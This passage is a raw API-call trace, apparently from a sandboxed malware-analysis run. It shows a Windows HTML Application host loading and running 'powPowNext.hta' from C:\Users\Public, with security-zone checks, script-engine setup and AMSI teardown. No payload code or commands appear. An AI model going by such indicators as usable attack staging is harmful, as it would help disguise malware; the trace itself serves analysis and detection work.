0x688f70 [0187.459] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xed8) returned 0x686078 [0187.459] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6481a8, Size=0xed8) returned 0x60e3f0 [0187.460] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6887f8, Size=0x7d0) returned 0x6896e8 [0187.460] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x688f70, Size=0x7d0) returned 0x60f2d0 [0187.460] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x686078, Size=0xfa0) returned 0x686078 [0187.460] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60e3f0, Size=0xfa0) returned 0x647bc0 [0187.460] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.472] LsDestroyLine () returned 0x0 [0187.472] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.472] LsSetDoc () returned 0x0 [0187.472] LsCreateLine () returned 0x0 [0187.473] LsQueryLineDup () returned 0x0 [0187.473] LsDestroyLine () returned 0x0 [0187.473] memcpy_s (in: _Destination=0x19dda0, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x19dda0) returned 0x0 [0187.474] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.474] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb78 | out: lpPerformanceCount=0x19fb78*=3100629332576) returned 1 [0187.474] QueryPerformanceCounter (in: lpPerformanceCount=0x19fafc | out: lpPerformanceCount=0x19fafc*=3100629345637) returned 1 [0187.475] QueryPerformanceCounter (in: lpPerformanceCount=0x19fae8 | out: lpPerformanceCount=0x19fae8*=3100629358649) returned 1 [0187.475] QueryPerformanceCounter (in: lpPerformanceCount=0x19fa8c | out: lpPerformanceCount=0x19fa8c*=3100629364629) returned 1 [0187.475] QueryPerformanceCounter (in: lpPerformanceCount=0x19fa84 | out: lpPerformanceCount=0x19fa84*=3100629388806) returned 1 [0187.475] QueryPerformanceCounter (in: lpPerformanceCount=0x19f9b4 | out: lpPerformanceCount=0x19f9b4*=3100629402657) returned 1 [0187.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.475] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.475] SetEvent (hEvent=0x304) returned 1 [0187.476] QueryPerformanceCounter (in: lpPerformanceCount=0x19fab0 | out: lpPerformanceCount=0x19fab0*=3100629518760) returned 1 [0187.476] GetClientRect (in: hWnd=0x103ba, lpRect=0x19fb18 | out: lpRect=0x19fb18) returned 1 [0187.478] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x6c8758 [0187.478] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f8a0 | out: ppu=0x19f8a0) returned 0x0 [0187.478] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0187.478] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0187.478] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.478] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f84c, dwFlags=0x0 | out: pdwZone=0x19f84c*=0xffffffff) returned 0x800c0011 [0187.479] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.479] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.479] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.479] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f830 | out: pPolicy=0x19f850*=0x0, pdwOutFlags=0x19f830*=0x0) returned 0x0 [0187.479] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f850, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f850*=0x0) returned 0x0 [0187.479] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.479] IUnknown:Release (This=0x5f0b00) returned 0x1 [0187.479] IUnknown:Release (This=0x609dbc) returned 0x7 [0187.479] ParseURLW (in: pcszURL="file:///C:/Users/Public/powPowNext.hta", ppu=0x19f818 | out: ppu=0x19f818) returned 0x0 [0187.480] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0187.480] IUnknown:AddRef (This=0x609dbc) returned 0x8 [0187.480] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.480] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f7c4, dwFlags=0x0 | out: pdwZone=0x19f7c4*=0xffffffff) returned 0x800c0011 [0187.480] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.480] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.480] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0187.480] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x5f0b00, pUri=0x609dbc, dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19f7a8 | out: pPolicy=0x19f7c8*=0x0, pdwOutFlags=0x19f7a8*=0x0) returned 0x0 [0187.480] IInternetSecurityManager:ProcessUrlAction (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", dwAction=0x1400, pPolicy=0x19f7c8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19f7c8*=0x0) returned 0x0 [0187.480] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0187.480] IUnknown:Release (This=0x5f0b00) returned 0x1 [0187.481] IUnknown:Release (This=0x609dbc) returned 0x7 [0187.481] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0187.481] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0187.481] GetCurrentThreadId () returned 0xb48 [0187.481] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0187.481] SysStringLen (param_1="file:///C:/Users/Public/powPowNext.hta") returned 0x26 [0187.481] _wcsicmp (_String1="", _String2="") returned 0 [0187.481] malloc (_Size=0x46) returned 0xc53ce8 [0187.482] malloc (_Size=0x22c) returned 0xc51058 [0187.482] malloc (_Size=0x804) returned 0xc7f628 [0187.482] malloc (_Size=0x19c) returned 0xc49728 [0187.482] VirtualAlloc (lpAddress=0x7364000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x7364000 [0187.497] free (_Block=0xc49728) [0187.497] VirtualAlloc (lpAddress=0x7365000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x7365000 [0187.498] malloc (_Size=0xc) returned 0xc5fcc8 [0187.499] malloc (_Size=0xc) returned 0xc5fc20 [0187.499] malloc (_Size=0x10) returned 0xc5fc98 [0187.499] malloc (_Size=0x30) returned 0xc5a488 [0187.499] free (_Block=0xc7f628) [0187.499] free (_Block=0xc51058) [0187.499] malloc (_Size=0x20) returned 0xc82cf0 [0187.499] free (_Block=0xc53ce8) [0187.499] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x765bedf6, dwHighDateTime=0x1d7d80b)) [0187.499] GetTickCount () returned 0x1d79618 [0187.500] GetCurrentThreadId () returned 0xb48 [0187.500] GetCurrentThreadId () returned 0xb48 [0187.500] _wcsicmp (_String1="window", _String2="window") returned 0 [0187.500] GetCurrentThreadId () returned 0xb48 [0187.500] GetCurrentThreadId () returned 0xb48 [0187.501] GetCurrentThreadId () returned 0xb48 [0187.501] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0187.501] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0187.501] malloc (_Size=0x28) returned 0xc5d218 [0187.501] GetCurrentThreadId () returned 0xb48 [0187.501] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0187.503] GetCurrentThreadId () returned 0xb48 [0187.503] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x765c7707, dwHighDateTime=0x1d7d80b)) [0187.503] GetTickCount () returned 0x1d79618 [0187.503] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0187.504] RegisterClassW (lpWndClass=0x19f490) returned 0xc06d [0187.504] CreateWindowExW (dwExStyle=0x0, lpClassName="WorkerW", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x6d6d0000, lpParam=0x0) returned 0x203e4 [0187.505] SetWindowLongW (hWnd=0x203e4, nIndex=0, dwNewLong=6465520) returned 0 [0187.506] SetWindowLongW (hWnd=0x203e4, nIndex=-4, dwNewLong=1842707472) returned 1999548128 [0187.506] SetTimer (hWnd=0x203e4, nIDEvent=0x1, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x1 [0187.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x765cebde, dwHighDateTime=0x1d7d80b)) [0187.506] GetTickCount () returned 0x1d79628 [0187.506] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x765cebde, dwHighDateTime=0x1d7d80b)) [0187.506] free (_Block=0xc82cf0) [0187.506] free (_Block=0xc5d218) [0187.506] GetTickCount () returned 0x1d79628 [0187.506] SetEvent (hEvent=0x388) returned 1 [0187.506] GetCurrentThreadId () returned 0xb48 [0187.507] GetCurrentThreadId () returned 0xb48 [0187.507] GetCurrentThreadId () returned 0xb48 [0187.507] GetCurrentThreadId () returned 0xb48 [0187.507] GetCurrentThreadId () returned 0xb48 [0187.507] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x5e0000) returned 1 [0187.507] GetCurrentThreadId () returned 0xb48 [0187.507] SetEvent (hEvent=0x29c) returned 1 [0187.508] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb98 | out: lpPerformanceCount=0x19fb98*=3100632664519) returned 1 [0187.508] QueryPerformanceCounter (in: lpPerformanceCount=0x19fae8 | out: lpPerformanceCount=0x19fae8*=3100632705278) returned 1 [0187.508] RedrawWindow (hWnd=0x30316, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x2) returned 1 [0187.509] SetEvent (hEvent=0x304) returned 1 [0187.509] GetMessageW (in: lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19fe74) returned 1 [0187.509] TranslateMessage (lpMsg=0x19fe74) returned 0 [0187.509] DispatchMessageW (lpMsg=0x19fe74) returned 0x0 [0187.510] GetCurrentThreadId () returned 0xb48 [0187.510] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19e050 | out: lpPoint=0x19e050) returned 1 [0187.510] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.511] ScreenToClient (in: hWnd=0x103ba, lpPoint=0x19deb8 | out: lpPoint=0x19deb8) returned 1 [0187.511] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.511] GetCurrentThreadId () returned 0xb48 [0187.511] GetCurrentThreadId () returned 0xb48 [0187.511] GetCurrentThreadId () returned 0xb48 [0187.512] DestroyWindow (hWnd=0x70258) returned 1 [0187.512] NtdllDefWindowProc_W () returned 0x0 [0187.513] PostQuitMessage (nExitCode=0) [0187.513] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0187.513] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x272, wParam=0x0, lParam=0x0, plResult=0x19fb20 | out: plResult=0x19fb20) returned 0x1 [0187.513] NtdllDefWindowProc_W () returned 0x0 [0187.527] GetCurrentThreadId () returned 0xb48 [0187.527] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0187.528] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2460 | out: hHeap=0x5e0000) returned 1 [0187.528] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x612510 | out: hHeap=0x5e0000) returned 1 [0187.528] RevokeDragDrop (hwnd=0x103ba) returned 0x0 [0187.533] GetCurrentThreadId () returned 0xb48 [0187.534] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0187.534] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x19fb18 | out: plResult=0x19fb18) returned 0x1 [0187.534] NtdllDefWindowProc_W () returned 0x0 [0187.534] GetCurrentThreadId () returned 0xb48 [0187.534] SetWindowLongW (hWnd=0x103ba, nIndex=-21, dwNewLong=0) returned 13697024 [0187.535] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dda78 | out: hHeap=0x5e0000) returned 1 [0187.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9528 | out: hHeap=0x5e0000) returned 1 [0187.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9378 | out: hHeap=0x5e0000) returned 1 [0187.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9450 | out: hHeap=0x5e0000) returned 1 [0187.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d92b8 | out: hHeap=0x5e0000) returned 1 [0187.536] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9438 | out: hHeap=0x5e0000) returned 1 [0187.537] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6c5898 | out: hHeap=0x5e0000) returned 1 [0187.538] NtdllDefWindowProc_W () returned 0x0 [0187.538] GetMessageW (in: lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19fe74) returned 1 [0187.539] TranslateMessage (lpMsg=0x19fe74) returned 0 [0187.539] DispatchMessageW (lpMsg=0x19fe74) returned 0x0 [0187.540] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.540] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x606f18, Size=0x828) returned 0x606f18 [0187.541] IUnknown:Release (This=0x5fc930) returned 0x4 [0187.541] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60cf00 | out: hHeap=0x5e0000) returned 1 [0187.541] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x618bb8 | out: hHeap=0x5e0000) returned 1 [0187.541] IUnknown:Release (This=0x5f5f5c) returned 0xe [0187.542] IUnknown:Release (This=0x5fc930) returned 0x3 [0187.542] IUnknown:Release (This=0x5f5f5c) returned 0xd [0187.542] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610c10 | out: hHeap=0x5e0000) returned 1 [0187.542] IUnknown:Release (This=0x5f5f5c) returned 0xc [0187.542] IUnknown:Release (This=0x5fc930) returned 0x2 [0187.542] IUnknown:Release (This=0x5f5f5c) returned 0xb [0187.543] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x615a40 | out: hHeap=0x5e0000) returned 1 [0187.543] IUnknown:Release (This=0x5f5f5c) returned 0xa [0187.543] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f20d0 | out: hHeap=0x5e0000) returned 1 [0187.543] IUnknown:Release (This=0x5f5f5c) returned 0x9 [0187.543] IUnknown:Release (This=0x5f5f5c) returned 0x8 [0187.543] IUnknown:Release (This=0x5f5f5c) returned 0x7 [0187.543] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60bbf8 | out: hHeap=0x5e0000) returned 1 [0187.543] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f2430 | out: hHeap=0x5e0000) returned 1 [0187.544] IUnknown:Release (This=0x5f0c00) returned 0x0 [0187.544] IUnknown:Release (This=0x5fd14c) returned 0x1 [0187.544] IUnknown:Release (This=0x5fd150) returned 0x0 [0187.544] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd148 | out: hHeap=0x5e0000) returned 1 [0187.544] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60bf50 | out: hHeap=0x5e0000) returned 1 [0187.544] IUnknown:Release (This=0x5f64f0) returned 0x0 [0187.544] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x610548 | out: hHeap=0x5e0000) returned 1 [0187.544] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60bef0 | out: hHeap=0x5e0000) returned 1 [0187.545] GetCurrentThreadId () returned 0xb48 [0187.545] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6187a8 | out: hHeap=0x5e0000) returned 1 [0187.545] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x616a50 | out: hHeap=0x5e0000) returned 1 [0187.545] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb98 | out: lpPerformanceCount=0x19fb98*=3100636446713) returned 1 [0187.546] QueryPerformanceCounter (in: lpPerformanceCount=0x19fae8 | out: lpPerformanceCount=0x19fae8*=3100636481876) returned 1 [0187.546] SetEvent (hEvent=0x304) returned 1 [0187.547] LoadStringW (in: hInstance=0x6d6d0000, uID=0x1fe9, lpBuffer=0x19f840, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4 [0187.547] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x60c038 | out: hHeap=0x5e0000) returned 1 [0187.547] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x63dea8 | out: hHeap=0x5e0000) returned 1 [0187.547] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x63dd18, Size=0xe) returned 0x63dd18 [0187.547] GetCurrentThreadId () returned 0xb48 [0187.548] IUnknown:AddRef (This=0x609dbc) returned 0x6 [0187.548] IUri:GetScheme (in: This=0x609dbc, pdwScheme=0x19ece0 | out: pdwScheme=0x19ece0*=0x9) returned 0x0 [0187.548] IUnknown:QueryInterface (in: This=0x609dbc, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19ec8c | out: ppvObject=0x19ec8c*=0x609dbc) returned 0x0 [0187.548] IUnknown:Release (This=0x609dbc) returned 0x6 [0187.548] IUnknown:AddRef (This=0x609dbc) returned 0x7 [0187.548] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/Public/powPowNext.hta", pszPath=0x19f4f8, pcchPath=0x19ecc8, dwFlags=0x0 | out: pszPath="C:\\Users\\Public\\powPowNext.hta", pcchPath=0x19ecc8) returned 0x0 [0187.548] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42) returned 0x6929a0 [0187.549] IUnknown:Release (This=0x609dbc) returned 0x6 [0187.549] GetWindowTextW (in: hWnd=0x70258, lpString=0x19e86c, nMaxCount=512 | out: lpString="") returned 0 [0187.549] SetWindowTextW (hWnd=0x70258, lpString="C:\\Users\\Public\\powPowNext.hta") returned 0 [0187.549] IUnknown:Release (This=0x609dbc) returned 0x5 [0187.549] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6929a0 | out: hHeap=0x5e0000) returned 1 [0187.549] LoadIconW (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0187.549] SendMessageW (hWnd=0x4031a, Msg=0x80, wParam=0x1, lParam=0x10027) returned 0x0 [0187.549] NtdllDefWindowProc_W () returned 0x0 [0187.551] SendMessageW (hWnd=0x70258, Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0187.552] SetWindowLongW (hWnd=0x70258, nIndex=-16, dwNewLong=-2100363264) returned 0 [0187.552] SetWindowLongW (hWnd=0x70258, nIndex=-20, dwNewLong=262144) returned 0 [0187.552] SetWindowPos (hWnd=0x70258, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 0 [0187.552] GlobalAddAtomW (lpString=0x0) returned 0x0 [0187.552] SetPropW (hWnd=0x4031a, lpString=0x0, hData=0x4031a) returned 0 [0187.552] SetWindowPos (hWnd=0x70258, hWndInsertAfter=0x0, X=-10, Y=-10, cx=0, cy=0, uFlags=0x15) returned 0 [0187.552] ShowWindow (hWnd=0x70258, nCmdShow=10) returned 0 [0187.552] UpdateWindow (hWnd=0x70258) returned 0 [0187.553] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0187.553] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0187.553] GetCurrentThreadId () returned 0xb48 [0187.553] StrCmpNICW (lpStr1="text/", lpStr2="text/", nChar=5) returned 0 [0187.553] StrCmpICW (pszStr1="javascript", pszStr2="javascript") returned 0 [0187.553] GetCurrentThreadId () returned 0xb48 [0187.553] GetCurrentThreadId () returned 0xb48 [0187.556] GetCurrentThreadId () returned 0xb48 [0187.556] GetCurrentThreadId () returned 0xb48 [0187.557] GetCurrentThreadId () returned 0xb48 [0187.557] QueryPerformanceCounter (in: lpPerformanceCount=0x19f730 | out: lpPerformanceCount=0x19f730*=3100637595629) returned 1 [0187.557] ScreenToClient (in: hWnd=0x0, lpPoint=0x19f580 | out: lpPoint=0x19f580) returned 0 [0187.558] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.558] GetCurrentThreadId () returned 0xb48 [0187.558] GetCurrentThreadId () returned 0xb48 [0187.558] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.558] QueryPerformanceCounter (in: lpPerformanceCount=0x19f6b8 | out: lpPerformanceCount=0x19f6b8*=3100637729843) returned 1 [0187.559] ScreenToClient (in: hWnd=0x0, lpPoint=0x19f518 | out: lpPoint=0x19f518) returned 0 [0187.559] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.559] ScreenToClient (in: hWnd=0x0, lpPoint=0x19f520 | out: lpPoint=0x19f520) returned 0 [0187.560] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.560] GetCurrentThreadId () returned 0xb48 [0187.560] GetCurrentThreadId () returned 0xb48 [0187.560] QueryPerformanceCounter (in: lpPerformanceCount=0x19f6b8 | out: lpPerformanceCount=0x19f6b8*=3100637916367) returned 1 [0187.560] GetCurrentThreadId () returned 0xb48 [0187.560] GetCurrentThreadId () returned 0xb48 [0187.561] IsWinEventHookInstalled (event=0x8000) returned 1 [0187.561] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/Public/powPowNext.hta") returned -5 [0187.561] StrCmpICW (pszStr1="about:blank", pszStr2="file:///C:/Users/Public/powPowNext.hta") returned -5 [0187.561] IUnknown:AddRef (This=0x609dbc) returned 0x6 [0187.561] IUnknown:AddRef (This=0x5f0b00) returned 0x2 [0187.561] IInternetSecurityManager:MapUrlToZone (in: This=0x6e8967bc, pwszUrl="file:///C:/Users/Public/powPowNext.hta", pdwZone=0x19f71c, dwFlags=0x0 | out: pdwZone=0x19f71c*=0xffffffff) returned 0x800c0011 [0187.561] IUnknown:Release (This=0x5f0b00) returned 0x1 [0187.561] IUnknown:Release (This=0x609dbc) returned 0x5 [0187.561] GetCurrentThreadId () returned 0xb48 [0187.562] GetMessageW (in: lpMsg=0x19fe74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19fe74) returned 0 [0187.562] GetWindowThreadProcessId (in: hWnd=0x30316, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0187.562] GetCurrentThreadId () returned 0xb48 [0187.562] PostMessageW (hWnd=0x30316, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0187.563] GetCurrentThreadId () returned 0xb48 [0187.563] GetCurrentThreadId () returned 0xb48 [0187.563] GetCurrentThreadId () returned 0xb48 [0187.563] IUri:GetScheme (in: This=0x609dbc, pdwScheme=0x19fd24 | out: pdwScheme=0x19fd24*=0x9) returned 0x0 [0187.564] ScreenToClient (in: hWnd=0x0, lpPoint=0x19fbb8 | out: lpPoint=0x19fbb8) returned 0 [0187.564] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.564] ScreenToClient (in: hWnd=0x0, lpPoint=0x19fbb8 | out: lpPoint=0x19fbb8) returned 0 [0187.565] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0187.565] GetCurrentThreadId () returned 0xb48 [0187.565] GetCurrentThreadId () returned 0xb48 [0187.565] IsWinEventHookInstalled (event=0x8001) returned 1 [0187.565] GetCurrentThreadId () returned 0xb48 [0187.565] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x610430) returned 0x0 [0187.566] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x604800 | out: hHeap=0x5e0000) returned 1 [0187.566] GetCurrentThreadId () returned 0xb48 [0187.567] GetCurrentThreadId () returned 0xb48 [0187.567] GetCurrentThreadId () returned 0xb48 [0187.567] GetCurrentThreadId () returned 0xb48 [0187.567] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64cf40 | out: hHeap=0x5e0000) returned 1 [0187.567] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ce28 | out: hHeap=0x5e0000) returned 1 [0187.567] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x690490 | out: hHeap=0x5e0000) returned 1 [0187.567] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5fd028 | out: hHeap=0x5e0000) returned 1 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] IUnknown:Release (This=0x68f968) returned 0x1 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] GetCurrentThreadId () returned 0xb48 [0187.568] free (_Block=0xc1a460) [0187.568] IUnknown:Release (This=0xcf8570) returned 0x7 [0187.568] IUnknown:Release (This=0xcf8570) returned 0x6 [0187.568] IUnknown:Release (This=0xcf8570) returned 0x5 [0187.569] free (_Block=0xc46920) [0187.569] free (_Block=0xc4c758) [0187.569] free (_Block=0xc4ab68) [0187.569] free (_Block=0xc4aad8) [0187.569] free (_Block=0xc486d8) [0187.569] ISystemDebugEventFire:EndSession (This=0x68f968) returned 0x0 [0187.569] IUnknown:Release (This=0x68f968) returned 0x0 [0187.569] GetUserDefaultLCID () returned 0x409 [0187.569] GetACP () returned 0x4e4 [0187.569] free (_Block=0xc5ad18) [0187.569] free (_Block=0xc4aa58) [0187.569] free (_Block=0xc5afa8) [0187.570] free (_Block=0xc4ca10) [0187.570] free (_Block=0xc1a350) [0187.570] free (_Block=0xc4ad48) [0187.570] GetCurrentThreadId () returned 0xb48 [0187.570] free (_Block=0xc1a780) [0187.570] free (_Block=0xc4ad78) [0187.571] GetProcAddress (hModule=0x6b040000, lpProcName="AmsiUninitialize") returned 0x6b043f20 [0187.571] AmsiUninitialize () returned 0x1 [0187.571] FreeLibrary (hLibModule=0x6b040000) returned 1 [0187.572] free (_Block=0xc4a598) [0187.574] GetCurrentThreadId () returned 0xb48 [0187.574] GetCurrentThreadId () returned 0xb48 [0187.575] free (_Block=0xc105e8) [0187.575] _flushall () returned 3 [0187.575] free (_Block=0xc14148) [0187.575] free (_Block=0xc141b0) [0187.575] free (_Block=0xc14230) [0187.575] free (_Block=0xc14518) [0187.575] free (_Block=0xc14550) [0187.575] free (_Block=0xc14588) [0187.575] free (_Block=0xc145c0) [0187.575] free (_Block=0xc14760) [0187.575] free (_Block=0xc14be0) [0187.576] free (_Block=0xc5a808) [0187.576] free (_Block=0xc5a7d0) [0187.576] free (_Block=0xc5a488) [0187.576] VirtualFree (lpAddress=0x7620000, dwSize=0x1000, dwFreeType=0x4000) returned 1 [0187.577] swprintf_s (in: _Dst=0x19f9f8, _SizeInWords=0x1a, _Format="%s%s%d" | out: _Dst="dowYouLikeLoop1") returned 15 [0187.577] free 